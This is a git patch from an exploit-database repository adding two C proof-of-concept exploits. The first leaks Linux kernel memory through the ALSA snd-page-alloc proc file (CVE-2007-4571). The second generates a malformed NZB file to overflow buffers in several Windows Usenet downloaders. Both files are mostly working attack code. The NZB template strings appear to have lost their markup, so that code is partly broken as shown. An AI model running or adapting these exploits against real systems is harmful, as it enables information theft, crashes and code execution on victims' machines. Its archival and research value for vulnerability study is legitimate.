From 8bf3aee631dfc23218d4c0bbf6432816ea589963 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 10 Nov 2022 17:10:37 +0000 Subject: [PATCH] DB: 2022-11-10 2 changes to exploits/shellcodes/ghdb --- exploits/linux/local/30605.c | 69 ++++++++++++++++ exploits/windows/dos/29618.c | 149 +++++++++++++++++++++++++++++++++++ 2 files changed, 218 insertions(+) create mode 100644 exploits/linux/local/30605.c create mode 100644 exploits/windows/dos/29618.c diff --git a/exploits/linux/local/30605.c b/exploits/linux/local/30605.c new file mode 100644 index 000000000..165eadd54 --- /dev/null +++ b/exploits/linux/local/30605.c @@ -0,0 +1,69 @@ +/* +source: https://www.securityfocus.com/bid/25774/info + +/* +The Linux kernel is prone to a local privilege-escalation vulnerability. + +Exploiting this issue may allow local attackers to gain elevated privileges, facilitating the complete compromise of affected computers. + +Versions of Linux kernel prior to 2.4.35.3 and 2.6.22.7 are vulnerable to this issue. +*/ + + +/* + ***************************************************************************************** + * by Karimo_DM under GPL * + * * + * Linux Kernel ALSA snd-page-alloc Local Proc File Information Disclosure Vulnerability * + * CVE-2007-4571 * + * * + * This simple PoF demonstrate how snd_page_alloc.c prior to Linux Kernel version * + * 2.6.22.8 (2.6.23-rc8) fails to boundary check a buffer in case of count=1 showing * + * parts of kernel memory (reaveling randomly some risky informations). * + * * + * karimo@localhost:~/src/c/bugs$ gcc -O2 cve20074571_alsa.c -ocve20074571_alsa * + * karimo@localhost:~/src/c/bugs$ ./cve20074571_alsa | hexdump -C * + * 00000000 00 03 55 55 27 00 00 00 10 50 12 08 1e 50 12 08 |..UU'....P...P..| * + * 00000010 4f 53 46 30 30 30 31 30 30 32 30 2f 2f 00 41 4e |OSF00010020//.AN| * + * 00000020 53 49 5f 58 33 2e 34 2d 31 39 00 03 55 55 27 00 |SI_X3.4-19..UU'.| * + * 00000030 00 00 10 50 12 08 1e 50 12 08 4f 53 46 30 30 30 |...P...P..OSF000| * + * 00000040 31 30 30 32 30 2f 2f 00 41 4e 53 49 5f 58 33 2e |10020//.ANSI_X3.| * + * 00000050 34 2d 31 39 00 03 55 55 27 00 00 00 10 50 12 08 |4-19..UU'....P..| * + * 00000060 1e 50 12 08 4f 53 46 30 30 30 31 30 30 32 30 2f |.P..OSF00010020/| * + * 00000070 2f 00 41 4e 53 49 5f 58 33 2e 34 2d 31 39 00 03 |/.ANSI_X3.4-19..| * + * 00000080 55 55 27 00 00 00 10 50 12 08 1e 50 12 08 4f 53 |UU'....P...P..OS| * + * 00000090 46 30 30 30 31 30 30 32 30 2f 2f 00 41 4e 53 49 |F00010020//.ANSI| * + * ... * + * 000051d0 00 02 20 00 78 ce ed da c0 43 93 c4 01 80 00 4d |.. .xÎíÚÀC.Ä...M| * + * 000051e0 71 88 9d 3c 04 27 0d 5d 80 ec 19 2f 12 8a 42 9d |q..<.'.].ì./..B.| * + * 000051f0 80 2e 9f c7 89 2c 87 ca 97 dd 50 8a e3 fa c3 15 |...Ç.,.Ê.ÝP.ãúÃ.| * + * 00005200 a2 3e 37 49 93 c4 01 80 00 4d 71 88 9d 3c 04 27 |¢>7I.Ä...Mq..<.'| * + * 00005210 0d 5d 80 ec 19 2f 12 8a 42 9d 80 2e 9f c7 89 2c |.].ì./..B....Ç.,| * + * 00005220 87 ca 97 dd 50 8a e3 fa c3 15 a2 3e 37 49 93 c4 |.Ê.ÝP.ãúÃ.¢>7I.Ä| * + * ... * + * * + * * + * [ Tested on a Slackware 12.0 running a self-compiled 2.6.21.3 Linux Kernel ] * + ***************************************************************************************** + */ + +#include +#include +#include +#include + +#define _SOME_NUM 0xffff + +int main() { + unsigned int j; + char kern_mem[2]; + int fd=open("/proc/driver/snd-page-alloc",O_RDONLY); + for (j=0;j<(unsigned int)_SOME_NUM;j++) { + memset(kern_mem,0,2); + /* That 1 really do the job ;P */ + if (!read(fd,kern_mem,1)) { + close(fd); + fd=open("/proc/driver/snd-page-alloc",O_RDONLY); + } else printf("%c",kern_mem[0]); + } +} \ No newline at end of file diff --git a/exploits/windows/dos/29618.c b/exploits/windows/dos/29618.c new file mode 100644 index 000000000..83abbc06f --- /dev/null +++ b/exploits/windows/dos/29618.c @@ -0,0 +1,149 @@ +// source: https://www.securityfocus.com/bid/22617/info + +News File Grabber is prone to a remote stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. + +Exploiting this issue allows attackers to execute arbitrary machine code in the context of the affected application. + +This issue affects version 4.1.0.1; other versions may also be affected. + +/*********************************************************************************************\ +* + * +* NZB Generic 0Day DoS Exploit + * +* Proofs of Concept for News File Grabber, NewsBin, Grabit, NewsReactor +and News Rover * +* + * +* + * +* Bugs in News Rover <=12.1 Rev 1: + * +* There's a stack overflow in RoverNZB triggered by files that contains a +long subject. * +* There's a stack overflow in NewsRover triggered by files that contains a +long group. * +* To trigger: run file.nzb + * +* Impact: Code execution on Windows XP, SP1 and SP2 + * +* + * +* Bug in News File Grabber 4.1.0.1: + * +* If the subject field contains a new line, the app will try to exec data in +memory. But * +* since the address changed every time the app runs it's very hard to +exploit. However I * +* sometimes got EIP overwritten by my chars + * +* To trigger: load file.nzb and start download. CPU -> 100% and then Out of +Memory error. * +* Impact: Code execution on Windows XP, SP1 and SP2 + * +* + * +* Bug in Grabit 1.5.3: + * +* Grabit does not correctly handle fields that contains a semicolon. + * +* To trigger: Just grab the file + * +* Impact: DoS + * +* Note: Grabit 1.6 is not affected. + * +* + * +* Bug in NewsReactor: + * +* There's a heap overflow that occurs when group field is too long. + * +* To trigger: load file.nzb, click grab. After a few tries to get the file +it crashes. * +* Impact: Code execution on Windows XP, SP1 and DoS on SP2 + * +* + * +* Bug in NewsBin Pro 4.3.2: + * +* There's a heap overflow that occurs when group field is too long. + * +* To trigger: load file.nzb, and start download. The app should then be +unstable. * +* Impact: Code execution on Windows XP, SP1 and DoS on SP2 + * +* + * +* Bug in NewsBin Pro 5.33 (maybe others...): + * +* There's a heap overflow that occurs when group field is too long. + * +* To trigger: load file.nzb, and start download. Then click "Delete All +Posts". Boom! * +* Impact: Code execution on Windows XP, SP1 and DoS on SP2 + * +* Note: Maybe it's possible to exec code on SP2, but there is a lot of bad +chars and with the * +* stack protection I didn't find a way to jump to a good return address. + * +* + * +* Solution: Buy your dvds leecha!!! + * +* + * +* + * +* Coded and discovered by Marsu + * +* Note: thx aux Bananas et a la KryptonIT. Bon courage aux inuITs :P + * +\*********************************************************************************************/ + +#include "stdlib.h" +#include "stdio.h" +#include "string.h" + +char nzbheader[]="\n" + "\n" + "\n" + "\n\n"; + + +char nzbend[]="\n" + "\n" + "\n" + "\n"; + + + +int main(int argc, char* argv[]) { + +FILE *file; +char * pad; + +printf("MarsupilamiPowa's Generic NZB DoS Exploit\n"); + +file=fopen("file.nzb","wb"); + +fprintf(file,nzbheader); +fprintf(file,"\n"); +fprintf(file,""); + +pad = (char*)malloc(sizeof(char)*3000); +memset(pad,'A',3000); +fprintf(file,pad); +fprintf(file,"\n\n"); +fprintf(file,"\n;\n"); +fprintf(file,nzbend); +fclose(file); + +printf("file.nzb generated! Have fun\n"); +return 0; + +} \ No newline at end of file